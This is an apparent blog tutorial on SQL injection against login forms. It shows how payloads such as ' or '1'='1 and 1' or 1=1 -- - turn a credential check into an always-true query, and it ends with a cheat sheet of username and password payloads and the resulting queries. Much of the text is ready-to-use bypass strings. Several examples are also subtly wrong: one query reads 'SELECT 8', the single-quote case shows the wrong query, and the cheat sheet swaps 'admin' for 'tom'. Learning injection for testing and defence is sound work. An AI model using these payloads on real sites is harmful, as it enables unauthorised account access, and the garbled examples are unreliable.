SQL Injection on Login Page.

In this post we are going to learn about SQL Injection and how we test login page using SQL Injection.

Let's Dive into this. Suppose we are testing a login page where username and password verification is must. Both username and password field is prone to code injection.

SQL Injection

Credential for logging.

Sr. No.	Username	Password	Status
1	admin	admin	ok
2	raj	1234	ok

SQL Injection

Executed SQL query when username is admin and password is admin:

SELECT 8 FROM users WHERE name='admin' and password='admin'

When a start login and enter the username and password, a SQL query generated and executed to search on the database to verify the username and password entered by user. The above query searches in the table where username is admin and password is admin. If the entries matches in table, the user is authenticated.

To bypass this security mechanism, SQL code has to be injected on to the input fields. The SQL code has to injected in a such way that SQL Statement return us a valid result upon the execution of SQL injection code. If there is an error in the syntax, it won't fetch a valid result. So putting random SQL commands and submitting will not always result in successful authentication.  

Executed SQL query when username is admin and password is a single quote:

SELECT * FROM users WHERE name='admin' and password=''

The above query is not going yield any output as it is not a valid query. If the web page is not filtering out the error message. You will be able to see an error message on the page. The trick is not the query valid by putting correct SQL commands on place.

Executed SQL query when username is admin and password is ' or '1'='1:

SELECT * FROM users WHERE name='admin' and password='' or '1'='1'

If the username is already known, the only thing is to be bypassed is the password verification. So, the SQL commands should be moderated in the similar way as given above.

The password="or'1'='1' condition is always true, so the password verification never happens. it can also be said that the above statement is more or less equal to 

SELECT * FROM users WHERE name='admin'

That is just only one possibility. The actual exploit is limited only by the imagination of the tester. 

Let's check out another possibility.

Executed SQL query when username is admin and password is ' or 1='1:

SELECT * FROM users WHERE name='admin' and password='' or 1='1'

The password='or 1='1 condition is also always true just like in previous case and thus bypasses the security.

The above two cases needed a valid username to be supplied. But that is not necessarily required since the username field is also vulnerable to SQL injection attacks.

Executed SQL query when username is ' or '1'='1 and password is ' or 1='1:

SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'

The SQL query is crafted in a such way that both username and password verification are bypassed. The above statement actually queries for all the users in the database and thus bypasses all the security.

Executed SQL query when username is ' or ' 1=1 and password is ' or ' 1=1:

SELECT * FROM users WHERE name='' or ' 1=1' and password='' or '1=1' 

The above query is also more and less similar to the previous query executed and is a possible way to get authenticated.

Cheat Sheet

SR. NO.	Username	Password	SQL Query
1	admin	admin	SELECT * FROM users WHERE name='tom'and password='tom'
2	admin	' or '1'='1	SELECT * FROM users WHERE name='tom' and password='' or '1'='1'
3	admin	' or 1='1	SELECT * FROM users WHERE name='tom' and password='' or 1='1'
4	admin	1' or 1=1 -- -	SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -'
5	' or '1'='1	' or '1'='1	SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
6	' or ' 1=1	' or ' 1=1	SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'